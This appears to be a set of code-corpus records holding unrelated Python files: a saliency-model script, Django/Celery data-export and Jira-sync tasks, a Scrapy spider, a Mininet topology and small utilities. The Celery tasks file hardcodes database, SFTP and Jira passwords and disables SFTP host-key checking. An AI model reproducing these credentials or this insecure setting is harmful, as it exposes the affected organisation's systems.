'chandelier', 'cougar_body', 'cougar_face', 'crab', 'crayfish', 'crocodile', 'crocodile_head', 'cup',\n                          'dalmatian', 'dollar_bill', 'dolphin', 'dragonfly', 'electric_guitar', 'elephant', 'emu', 'euphonium', 'ewer',\n                          'Faces', 'Faces_easy', 'ferry', 'flamingo', 'flamingo_head', 'garfield', 'gerenuk', 'gramophone', 'grand_piano',\n                          'hawksbill', 'headphone', 'hedgehog', 'helicopter', 'ibis', 'inline_skate', 'joshua_tree', 'kangaroo', 'ketch',\n                          'lamp', 'laptop', 'Leopards', 'llama', 'lobster', 'lotus', 'mandolin', 'mayfly', 'menorah', 'metronome', 'minaret',\n                          'Motorbikes', 'nautilus', 'octopus', 'okapi', 'pagoda', 'panda', 'pigeon', 'pizza', 'platypus', 'pyramid',\n                          'revolver', 'rhino', 'rooster', 'saxophone', 'schooner', 'scissors', 'scorpion', 'sea_horse', 'snoopy',\n                          'soccer_ball', 'stapler', 'starfish', 'stegosaurus', 'stop_sign', 'strawberry', 'sunflower', 'tick', 'trilobite',\n                          'umbrella', 'watch', 'water_lilly', 'wheelchair', 'wild_cat', 'windsor_chair', 'wrench', 'yin_yang']\n\ndef get_test_info(sal_mode='e'):\n    if sal_mode == 'e':\n        image_root = './data/ECSSD/Imgs/'\n        image_source = './data/ECSSD/test.lst'\n    elif sal_mode == 'p':\n        image_root = './data/PASCALS/Imgs/'\n        image_source = './data/PASCALS/test.lst'\n    elif sal_mode == 'd':\n        image_root = './data/DUTOMRON/Imgs/'\n        image_source = './data/DUTOMRON/test.lst'\n    elif sal_mode == 'h':\n        image_root = './data/HKU-IS/Imgs/'\n        image_source = './data/HKU-IS/test.lst'\n    elif sal_mode == 's':\n        image_root = './data/SOD/Imgs/'\n        image_source = './data/SOD/test.lst'\n    elif sal_mode == 't':\n        image_root = './data/DUTS-TE/Imgs/'\n        image_source = './data/DUTS-TE/test.lst'\n    elif sal_mode == 'm_r': # for speed test\n        image_root = './data/MSRA/Imgs_resized/'\n        image_source = './data/MSRA/test_resized.lst'\n    elif sal_mode == 'robinson':\n        
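# each branch maps a dataset key to an (image_root, image_list) pair; e.g.\n        # the 'e' key above resolves to ('./data/ECSSD/Imgs/', './data/ECSSD/test.lst')\n        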
image_root = './data/Robinson/Imgs/'\n image_source = './data/Robinson/Imgs/filename.txt'\n elif sal_mode == 'cifar100-category0':\n image_root = './data/cifar100/test/apple/'\n image_source = './data/cifar100/test/apple/test.txt'\n elif sal_mode == '101_ObjectCategories':\n image_root = './data/101_ObjectCategories/accordion/'\n image_source = './data/101_ObjectCategories/accordion/test.txt'\n else:\n for category in caltech_101_categories:\n if sal_mode == 'caltech101-' + category:\n image_root = './data/101_ObjectCategories/' + category + '/'\n image_source = './data/101_ObjectCategories/' + category + '/test.txt'\n print(\"sal_mode: in getting root/source directory\", sal_mode)\n return image_root, image_source\n\ndef main(config):\n if config.mode == 'train':\n train_loader = get_loader(config)\n run = 0\n while os.path.exists(\"%s/run-%d\" % (config.save_folder, run)):\n run += 1\n os.mkdir(\"%s/run-%d\" % (config.save_folder, run))\n os.mkdir(\"%s/run-%d/models\" % (config.save_folder, run))\n config.save_folder = \"%s/run-%d\" % (config.save_folder, run)\n train = Solver(train_loader, None, config)\n train.train()\n elif config.mode == 'test':\n #config.test_root, config.test_list = get_test_info(config.sal_mode)\n test_loader = get_loader(config, mode='test')\n if not os.path.exists(config.test_fold):\n os.mkdir(config.test_fold)\n test = Solver(None, test_loader, config)\n test.test()\n else:\n raise IOError(\"illegal input!!!\")\n\nif __name__ == '__main__':\n\n vgg_path = './dataset/pretrained/vgg16_20M.pth'\n resnet_path = './dataset/pretrained/resnet50_caffe.pth'\n\n parser = argparse.ArgumentParser()\n\n # Hyper-parameters\n parser.add_argument('--n_color', type=int, default=3)\n parser.add_argument('--lr', type=float, default=5e-5) # Learning rate resnet:5e-5, vgg:1e-4\n parser.add_argument('--wd', type=float, default=0.0005) # Weight decay\n parser.add_argument('--no-cuda', dest='cuda', action='store_false')\n\n # Training settings\n parser.add_argument('--arch', type=str, default='resnet') # resnet or vgg\n parser.add_argument('--pretrained_model', type=str, default=resnet_path)\n parser.add_argument('--epoch', type=int, default=24)\n parser.add_argument('--batch_size', type=int, default=1) # only support 1 now\n parser.add_argument('--num_thread', type=int, default=1)\n parser.add_argument('--load', type=str, default='')\n parser.add_argument('--save_folder', type=str, default='./results')\n parser.add_argument('--epoch_save', type=int, default=3)\n parser.add_argument('--iter_size', type=int, default=10)\n parser.add_argument('--show_every', type=int, default=50)\n\n # Train data\n parser.add_argument('--train_root', type=str, default='')\n parser.add_argument('--train_list', type=str, default='')\n\n # Testing settings\n parser.add_argument('--model', type=str, default=None) # Snapshot\n parser.add_argument('--test_fold', type=str, default=None) # Test results saving folder\n parser.add_argument('--sal_mode', type=str, default='e') # Test image dataset\n\n # Misc\n parser.add_argument('--mode', type=str, default='train', choices=['train', 'test'])\n config = parser.parse_args()\n\n # make ./results\n if not os.path.exists(config.save_folder):\n os.mkdir(config.save_folder)\n\n if not os.path.exists(config.test_fold):\n os.mkdir(config.test_fold)\n\n base_results_folder = config.test_fold\n if \"caltech101\" in config.sal_mode:\n for category in caltech_101_categories:\n # Get test set info\n test_root, test_list = get_test_info(config.sal_mode + '-' + category)\n 
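# run one full test pass per Caltech-101 category; each pass writes\n            # its results into a per-category folder under the shared test_fold\n            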
config.test_root = test_root\n config.test_list = test_list\n\n config.test_fold = base_results_folder + '/' + category\n main(config)\n\n else:\n # Get test set info\n test_root, test_list = get_test_info(config.sal_mode)\n config.test_root = test_root\n config.test_list = test_list\n\n main(config)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386161380","text":"import os\nimport json\nimport shutil\nimport math as mt\nfrom datetime import datetime\n\nimport numpy as np\nimport pandas as pd\nimport pymysql\nimport pysftp\nfrom jira.client import JIRA\n\nfrom celery import task\nfrom django.core.mail import send_mail\nfrom django.db import connections\nfrom django.utils import timezone\n\nfrom home.models import Iteration\nfrom triggers.models import Directories, Messages\n\n\nfrom codes.iteration_files.postgres_dump import generate_jira_file_v4\nfrom codes.masters.update_hierarchy import master_hierarchy_flat\nfrom codes.v4_validation.kv_audits import kv_audits\nfrom celery.signals import worker_process_init\nfrom multiprocessing import current_process\n\n@worker_process_init.connect\ndef fix_multiprocessing(**kwargs):\n try:\n current_process()._config\n except AttributeError:\n current_process()._config = {'semprefix': '/mp'}\n\n#for connection with sql\nhostname = \"172.16.2.32\"\nport = 3306\nusername = \"shaun\" \npassword = \"shaun@123\"\ndefault_database = \"validationdb_fuzion\"\n\n#for connection with sftp\nhostname_sftp = \"niel-ftp.colpal.com\"\nport_sftp = 22\nusername_sftp = \"fractal\"\npassword_sftp = \"Fuke8ega\"\n\n\ndef dict_fetchall(cursor):\n desc = cursor.description\n return [dict(zip([col[0] for col in desc], row)) for row in cursor.fetchall()]\n\ndef execute_file_query(file):\n script=open(file,'r') #takes .txt file as input for script\n query=script.read()\n script.close()\n with connections['default'].cursor() as cur:\n cur.execute(query)\n dict_result = dict_fetchall(cur)\n result=pd.DataFrame(dict_result)\n return result\n\ndef execute_commit(query):\n conn = pymysql.connect(host=hostname,port=port,user=username,\n passwd=password,database=default_database,autocommit=True,local_infile=True)\n c = conn.cursor(pymysql.cursors.DictCursor)\n c.execute(query)\n c.close()\n conn.close()\n\ndef mysql_insert(data,iteration_name):\n with connections['default'].cursor() as cur:\n cur.execute(\"\"\"\n DELETE FROM mappingdb.jira_status where iteration like \"{iteration_name}\"\n \"\"\".format(iteration_name=iteration_name))\n cur.executemany(\"\"\"\n INSERT INTO mappingdb.jira_status(issue_key, country, subcategory, division, assignee_name, status, resolutiondate, iteration)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\",data)\n connections['default'].commit()\n\n\n\ndef convert_epoctime_to_string(epoctime):\n standard_time_format = datetime.fromtimestamp(epoctime).strftime('%Y-%m-%d %H:%M:%S')\n return standard_time_format\n\ndef to_datetime(date_time):\n py_datetime = datetime.strptime(date_time,'%Y-%m-%d %H:%M:%S')\n return py_datetime\n\n#upload file to sftp\ndef upload(localpath,remotepath):\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None \n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n sftp.put_d(localpath=localpath,remotepath=remotepath)\n file_list = sftp.listdir(remotepath)\n modified_file = []\n for f in file_list:\n 
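# collect the mtime of every remote file; the oldest one is returned so\n        # gm_filetime_validation can detect a stale (failed) upload\n        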
modified_file.append(sftp.stat(remotepath+'/'+f).st_mtime)\n earliest_file_date_modified = convert_epoctime_to_string(min(modified_file))\n sftp.close()\n return earliest_file_date_modified\n\ndef gm_failure_mail():\n send_mail(\n 'Global Mapping Trigger Failed',\n 'Kindly Trigger Manually.',\n 'shaun.mendes@fractalanalytics.com',\n ['gaurav.acharekar@fractalanalytics.com','shaun.mendes@fractalanalytics.com'],\n fail_silently=False)\n\ndef gm_filetime_validation(filetime):\n current_filetime = to_datetime(filetime)\n current_time = datetime.now()\n difference =current_time - current_filetime\n if difference.seconds//3600 > 3:\n gm_failure_mail()\n return 'danger'\n else:\n return 'success'\n\n@task\ndef gm():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='script_path').path\n\n #local save path\n save_path=Directories.objects.get(purpose='save_path').path\n\n #sftp path\n sftp_path=Directories.objects.get(purpose='sftp_path').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n \n GM=script_path+'GM_script.txt'\n GM_file=execute_file_query(GM)\n\n msg = Messages(message_text = 'Global Mapping Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n GM_file_id=GM_file[['ID','DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n\n GM_file_id.to_csv(save_path+'Global_Mapping_with_id.csv',index=False)\n msg = Messages(message_text = 'Global Mapping with Id File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n GM_file=GM_file[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n GM_file.to_csv(save_path+'Global_Mapping.csv',index=False)\n msg = Messages(message_text = 'Global Mapping File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n scale=script_path+'Scale_script.txt'\n scale_file=execute_file_query(scale)\n scale_file=scale_file[['COUNTRY_NAME','SUBCATEGORY_NAME','VALUE','VOLUME']]\n scale_file.to_csv(save_path+'scale.csv',index=False)\n\n msg = Messages(message_text = 'Scale File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n\n variants=execute_file_query(script_path+'Variant_script.txt')\n map_gpt=execute_file_query(script_path+'map_gpt.txt')\n mas_gpt=execute_file_query(script_path+'mas_gpt.txt')\n\n GM_variant=pd.merge(GM_file,variants,how='left',left_on='GLOBAL_VARIANT',right_on='variant_name')\n\n GM_map_gpt=pd.merge(GM_variant,map_gpt,how='left',left_on='id',right_on='variantid')\n\n GM_mas_gpt=pd.merge(GM_map_gpt,mas_gpt,how='left',left_on='gptid',right_on='id')\n\n GM_gpt=GM_mas_gpt.rename(columns={'name':'GLOBAL_GPT'})\n\n GM_gpt=GM_gpt[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT','GLOBAL_GPT']]\n\n GM_gpt.to_csv(save_path+'Global_Mapping_GPT.csv',index=False)\n\n msg = Messages(message_text = 'Global Mapping GPT 
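# cd() changes the remote working directory, so put() lands the file directly in remotepath\r\n        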
File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 1)\n msg.save()\n \n msg = Messages(message_text = 'Upload Started', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n date_modified = upload(save_path,sftp_path)\n \n msg = Messages(message_text = 'Upload Successful', posted_time = timezone.now() , status = 'warning' ,trigger_id = 1)\n msg.save()\n\n status = gm_filetime_validation(date_modified)\n\n msg = Messages(message_text = 'Process Complete Successfully \\n Time {}'.format(date_modified), posted_time = timezone.now() , status = status, trigger_id = 1)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 1)\n msg.save()\n\n@task\ndef example_task():\n print(\"Hello How are you\")\n\n\njira_options = {'server': 'https://fractalanalytics.atlassian.net'}\n@task \ndef jira_update():\n iteration_name = Iteration.objects.order_by('-id').first().iteration_name\n try:\n jira = JIRA(options=jira_options, basic_auth=('shaun.mendes@fractalanalytics.com', 'Shaun@123'))\n msg = Messages(message_text = 'Connection Established With Jira', posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n iteration_name = Iteration.objects.order_by('-id').first().iteration_name\n issues = jira.search_issues(\n 'project = CPGDH AND issuetype = \"GoLive Release\" AND Period = \"{0}\" ORDER BY updatedDate DESC'.format(iteration_name), maxResults=None)\n msg = Messages(message_text = \"Jira Data Obtained\", posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n data = [[i.key, i.raw['fields']['customfield_10024']['value'], i.raw['fields']\n ['customfield_10026']['value'], i.raw['fields']['customfield_11102']['value'], i.fields.assignee.name,\n i.fields.resolution.name if i.fields.status.name=='Closed' else i.fields.status.name,\n datetime.strptime(i.raw['fields']['resolutiondate'][:10],'%Y-%m-%d') if i.raw['fields']['resolutiondate'] else None,\n iteration_name\n ] for i in issues]\n msg = Messages(message_text = \"Writing to MYSQL\", posted_time = timezone.now() , status = 'warning' ,trigger_id = 2)\n msg.save()\n \n mysql_insert(data,iteration_name)\n msg = Messages(message_text = \"Data Inserted\", posted_time = timezone.now() , status = 'success' ,trigger_id = 2)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 2)\n msg.save()\n\n@task\ndef jira_update_v4():\n generate_jira_file_v4()\n \n@task \ndef update_hierarchy():\n master_hierarchy_flat()\n\n@task\ndef cp_extracts_download():\n from codes.sftp.sftp_files import download_udm_extracts\n download_udm_extracts()\n\n@task\ndef sftp_download(sftp_file_path, save_path):\n save_file_path = os.path.join(save_path,os.path.split(sftp_file_path)[1])\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None\n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n sftp.get(sftp_file_path,save_file_path)\n sftp.close()\n\n@task\ndef copy_file(file_path, copy_path):\n try:\n shutil.copy2(file_path,copy_path)\n except:\n pass\n\n#upload file to sftp\ndef upload_file(localfilepath,remotepath):\n cnopts = pysftp.CnOpts()\n cnopts.hostkeys = None \n sftp=pysftp.Connection(host=hostname_sftp,username=username_sftp,\n password=password_sftp,port=port_sftp,\n cnopts=cnopts)\n with sftp.cd(remotepath):\n 
sftp.put(localpath = localfilepath)\n file_list = sftp.listdir(remotepath)\n modified_file = []\n for f in file_list:\n modified_file.append(sftp.stat(remotepath+'/'+f).st_mtime)\n earliest_file_date_modified = convert_epoctime_to_string(min(modified_file))\n sftp.close()\n return earliest_file_date_modified\n\n@task\ndef l2g():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='local2global_script').path\n\n #local save path\n save_path=Directories.objects.get(purpose='local2global_save').path\n\n #sftp path\n sftp_path=Directories.objects.get(purpose='local2global_sftp').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 7)\n msg.save()\n \n l2g=script_path+'script.txt'\n l2g_file=execute_file_query(l2g)\n l2g_file=l2g_file[[\"Country\",\"Subcategory\",\"description\",\"istotal\",\"Channel\"]]\n msg = Messages(message_text = 'Local to Global RE Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 7)\n msg.save()\n savefilename = save_path+'LocalToGlobalRE.csv'\n l2g_file.to_csv(savefilename,index=False)\n msg = Messages(message_text = 'Local to Global RE Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 7)\n msg.save()\n\n msg = Messages(message_text = 'Upload Started', posted_time = timezone.now() , status = 'warning' ,trigger_id = 7)\n msg.save()\n\n date_modified = upload_file(savefilename,sftp_path)\n \n msg = Messages(message_text = 'Upload Successful with update time '+date_modified, posted_time = timezone.now() , status = 'success' ,trigger_id = 7)\n msg.save()\n \n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 7)\n msg.save()\n\n@task\ndef gm_file():\n try:\n #path for script file\n script_path=Directories.objects.get(purpose='script_path').path\n\n #local save path\n save_path=Directories.objects.get(purpose='gm_save_path').path\n\n msg = Messages(message_text = 'Process Started', posted_time = timezone.now() , status = 'warning', trigger_id = 6)\n msg.save()\n \n GM=script_path+'GM_script.txt'\n GM_file=execute_file_query(GM)\n GM_file=GM_file[['DIVISION_NAME','SUBDIVISION_NAME','REGION_NAME',\n 'COUNTRY_NAME','SUBCATEGORY_NAME','PRODUCT',\n 'LOCAL_MANUFACTURER','LOCAL_BRAND','LOCAL_SUBBRAND',\n 'LOCAL_VARIANT','GLOBAL_MANUFACTURER','GLOBAL_BRAND',\n 'GLOBAL_SUBBRAND','GLOBAL_VARIANT']]\n msg = Messages(message_text = 'Global Mapping Query Complete', posted_time = timezone.now() , status = 'warning' ,trigger_id = 6)\n msg.save()\n GM_file.to_csv(save_path+'Global_Mapping.csv',index=False)\n msg = Messages(message_text = 'Global Mapping File Ready', posted_time = timezone.now() , status = 'warning', trigger_id = 6)\n msg.save()\n\n load_data_query = \"\"\"\n LOAD DATA LOCAL INFILE '{file_path}'\n INTO TABLE {table_name} FIELDS TERMINATED BY ',' \n ENCLOSED BY '\"' LINES TERMINATED BY '\\n' IGNORE 1 LINES;\n \"\"\".format(file_path = save_path+'Global_Mapping.csv', table_name = \"mappingdb.daily_global_mappings\")\n\n execute_commit(\"TRUNCATE TABLE {table_name}\".format(table_name=\"mappingdb.daily_global_mappings\"))\n execute_commit(load_data_query)\n\n msg = Messages(message_text = 'Data succeessfully loaded into mappingdb.daily_global_mappings', posted_time = timezone.now() , status = 'success', trigger_id = 6)\n msg.save()\n except Exception as e:\n msg = Messages(message_text = str(e), posted_time = timezone.now() , status = 'danger' ,trigger_id = 
6)\n msg.save()\n\n\n@task\ndef detail_audits():\n kv_audits()","sub_path":"triggers/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34897417","text":"import math\nimport numpy as np\nimport sympy as sp\n\n\n\ndef compute(r):\n return math.sin(r)\n\ndef lagrange(nodes):\n\n\n tmp_x_nodes = [node['X']for node in nodes]\n tmp_y_nodes = [node['Y']for node in nodes]\n\n x_nodes = np.asarray(tmp_x_nodes,dtype=np.float)\n y_nodes = np.asarray(tmp_y_nodes,dtype=np.float)\n\n x = sp.symbols('x')\n y = sp.symbols('y')\n\n pol_base = []\n pol_lag = []\n\n for i in range(len(x_nodes)):\n LUp = []\n LDown = []\n for j in range(len(nodes)):\n if j != i:\n express=(x-x_nodes[j])\n express_1=(x_nodes[i]-x_nodes[j])\n LUp.append(\"{\" + str(express) + \" \\over \" + str(express_1) + \"}\")\n LDown.append(express/express_1)\n pol_base.append([i, LUp])\n pol_lag.append(LDown)\n\n #print pol_base\n\n P=0\n product_result = []\n\n\n for n1 in range(len(pol_lag)):\n test = 1\n for n2 in range(len(pol_lag[n1])):\n test = test * pol_lag[n1][n2]\n\n ptoria = sp.expand(test)\n product_result.append([n1, sp.latex(ptoria), y_nodes[n1]])\n\n P = P + (test * y_nodes[n1])\n\n expt = sp.expand(P)\n latx = sp.latex(expt)\n\n response_data = {\n 'result': latx,\n 'basePol': pol_base,\n 'sumProduct': product_result,\n }\n\n return response_data\n","sub_path":"Polinomial_2/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288313488","text":"import cv2\n\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n dim = None\n (h, w) = image.shape[:2]\n if width is None and height is None:\n return image\n if width is None:\n r = height / float(h)\n dim = (int(w * r), height)\n else:\n r = width / float(w)\n dim = (width, int(h * r))\n resized = cv2.resize(image, dim, interpolation = inter)\n return resized\nimage=cv2.imread(\"BORI-11-page-001_working.jpg\")\nimage = image_resize(image, height = 2000)\ncv2.imwrite(\"BORI.jpg\",image)","sub_path":"docimage/resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"226198795","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport scipy.spatial.distance as ssd\nimport scipy.stats as ss\nfrom escriu import *\n\n\ndef minpvalue(full):\n f=open(\"songs.txt\", \"r\")\n sample=f.read().strip().split(',')\n sample = [ float(x) for x in sample ]\n y1, y2 = np.array(sample), np.array(full)\n i, pvalues= 0, []\n minim=len(y1)\n ym=y2[0:minim]\n\n while minim+i<len(y2):\n x1 = np.linspace(1, len(y1), len(y1))\n xm = x1\n # Interpolating now, using linear, but you can do better based on your data\n f = interp1d(x1, y1)\n fm = interp1d(xm ,ym)\n\n points = 15\n\n xnew1 = np.linspace ( min(x1), max(x1), num = points)\n xnewm = np.linspace ( min(xm), max(xm), num = points)\n\n ynew1 = f(xnew1)\n ynewm = fm(xnewm)\n\n # Now compute correlations\n a=ssd.correlation(ynew1, ynewm) # Computes a distance measure based on correlation between the two vectors\n b=np.correlate(ynew1, ynewm, mode='valid') # Does a cross-correlation of same sized arrays and gives back correlation\n c=np.corrcoef(ynew1, ynewm) # Gives back the correlation matrix 
for the two arrays\n d=ss.spearmanr(ynew1, ynewm) # Gives the spearman correlation for the two arrays\n pvalues.append(abs(d[0]))\n i+=1\n ym=y2[i:minim+i]\n minpvalue=max(pvalues)\n return minpvalue\n","sub_path":"Antics/spear.py","file_name":"spear.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"170342784","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Guckenheimer spider created on top of the ATSSpider\nscrapy crawl guckenheimer -a url=\"http://www.guckenheimer.com/careers/\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://www.guckenheimer.com/careers/\n\"\"\"\nfrom urlparse import urljoin\nfrom re import compile\nfrom json import loads as json_loads\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, UrlJoin, ConvertDateString\n\n\nclass Guckenheimer(ATSSpider):\n\n name = \"guckenheimer\"\n api_re = compile('id=(.*)')\n api_link = \"\"\n current_page = 0\n total_pages = 1\n disable_default_field_extractors = True\n\n def parse(self, response):\n sel = Selector(response)\n api_link_id = sel.xpath(\n \"//script[contains(@src,'ATSNotifications.js')]/@src\"\n ).extract()\n if api_link_id:\n res = self.api_re.search(api_link_id[0])\n if res:\n self.api_link = urljoin(\n api_link_id[0],\n \"/ClientContent/GetJobBoardAdvSearch/%s\" % res.group(1)\n )\n yield Request(\n self.api_link+\"?page=1&rowsperpage=100\",\n callback=self.parse_api\n )\n\n def parse_api(self, response):\n self.current_page += 1\n try:\n resdata = json_loads(response.body)\n except:\n return\n\n if self.current_page == 1:\n self.expected_job_count = resdata['totalrows']\n self.total_pages = resdata['pages']\n\n for job in resdata['rows']:\n job_link = urljoin(\n response.url,\n \"/ClientContent/GetJobDescription/%s\" % job.get(\n 'PositionID', ''\n )\n )\n meta = {\n 'jobid': job.get('PositionID', ''),\n 'location': job.get('Location', ''),\n 'jobtype': job.get('EmploymentType', ''),\n 'date': job.get('PostDateString', ''),\n }\n yield Request(\n url=job_link, meta=meta, callback=self.parse_job_callback()\n )\n\n if self.current_page < self.total_pages:\n next_url = self.api_link+(\n \"?page=%s&rowsperpage=100\" % (self.current_page+1)\n )\n yield Request(url=next_url, callback=self.parse_api)\n\n def parse_job(self, response):\n try:\n details = json_loads(response.body)\n except:\n return\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value(\n 'referencenumber', str(response.meta['jobid']),\n Prefix(\"%s-\" % self.name)\n )\n loader.add_value('location', response.meta['location'])\n loader.add_value('jobtype', response.meta['jobtype'])\n loader.add_value(\n 'date', response.meta['date'], ConvertDateString(\"%m/%d/%Y\")\n )\n loader.add_value('description', details.get('description', ''))\n loader.add_value('title', details.get('positiontitle', ''))\n loader.add_value(\n 'url', \"/careers/?ATSPopupJob=%s\" % response.meta['jobid'],\n UrlJoin(self.start_urls[0])\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/guckenheimer.py","file_name":"guckenheimer.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281797297","text":"from mininet.topo import Topo\n\nfrom mininet.node import 
OVSKernelSwitch\nfrom mininet.link import TCLink\n\nclass SimpleTopo(Topo):\n\n    def __init__( self ):\n        \"Create simple topo.\"\n\n        # Initialize topology\n        Topo.__init__( self )\n\n        # Add switches\n        s1 = self.addSwitch( 's1', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:01' )\n        s2 = self.addSwitch( 's2', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:02' )\n        s3 = self.addSwitch( 's3', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:03' )\n        s4 = self.addSwitch( 's4', cls=OVSKernelSwitch, dpid='00:00:00:00:00:00:00:04' )\n\n        # Add hosts (three hosts share the cpu budget)\n        hostsNumber = 3\n        userOneHost = self.addHost( 'User1', ip='10.0.0.101/24', cpu=.1/hostsNumber )\n\n        httpLsHost = self.addHost( 'HTTP_LS', ip='10.0.0.1/24', cpu=.1/hostsNumber )\n        httpSsHost = self.addHost( 'HTTP_SS', ip='10.0.0.2/24', cpu=.1/hostsNumber )\n\n\n        # Add links between switches\n        self.addLink( s1, s2, cls=TCLink , bw=10 )\n        self.addLink( s1, s3, cls=TCLink , bw=10 )\n\n        self.addLink( s2, s4, cls=TCLink , bw=10 )\n\n        self.addLink( s3, s4, cls=TCLink , bw=10 )\n\n        # Add links to services\n        self.addLink( s4, httpLsHost, cls=TCLink )\n        self.addLink( s4, httpSsHost, cls=TCLink )\n\n        #Add links to users\n        self.addLink( s1, userOneHost, cls=TCLink )\n\ntopos = { 'simpletopo': (lambda: SimpleTopo())}","sub_path":"scenarios/simple-net/mininet/manual/simple-topo.py","file_name":"simple-topo.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"93969910","text":"class Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        nums_copy=nums\n        a=0\n        b=0\n        same_flag=0\n        #print(\"nums_copy\")\n\n        #for k in nums_copy:\n        #    if k >=target :\n        #        del nums_copy[nums_copy.index(k):]\n        #        break\n        \n        k_index=0\n        l_index=1\n        for k in nums_copy:#a_index\n            l_s_index=k_index+1\n            l_index=l_s_index\n            for l in nums_copy[l_s_index:]:#b_index\n                if l+k == target:\n                    #print(\"itering1\")\n                    #print(\"l=\"+str(l))#debug\n                    #print(\"k=\"+str(k))#debug \n                    a=k_index\n                    b=l_index\n                    same_flag=1\n                    break\n                l_index+=1\n            if same_flag:#stop searching once a pair is found\n                break\n            k_index+=1\n        \n\n        index0=a\n        index1=b\n        \n        \n        res=[] \n        #print(nums_copy)#debug\n        if index0>index1 :\n            res=[index1,index0]\n        else :\n            res=[index0,index1]\n        \n        return res\n    \ns=Solution()\n#nums=[2, 7, 11, 15]\n#target=9\n#print(s.twoSum(nums, target))\n#\n#\n#nums=[2, 7, 11,2,15]\n#target=4\n#print(s.twoSum(nums, target))\n#\n#nums=[-3,4,3,90]\n#target=0\n#print(s.twoSum(nums, target))\n\n\nnums=[0,4,3,0]\ntarget=0\nprint(s.twoSum(nums, target))","sub_path":"exercise/leetcode/python_src/by2017_Sep/Leet001.py","file_name":"Leet001.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
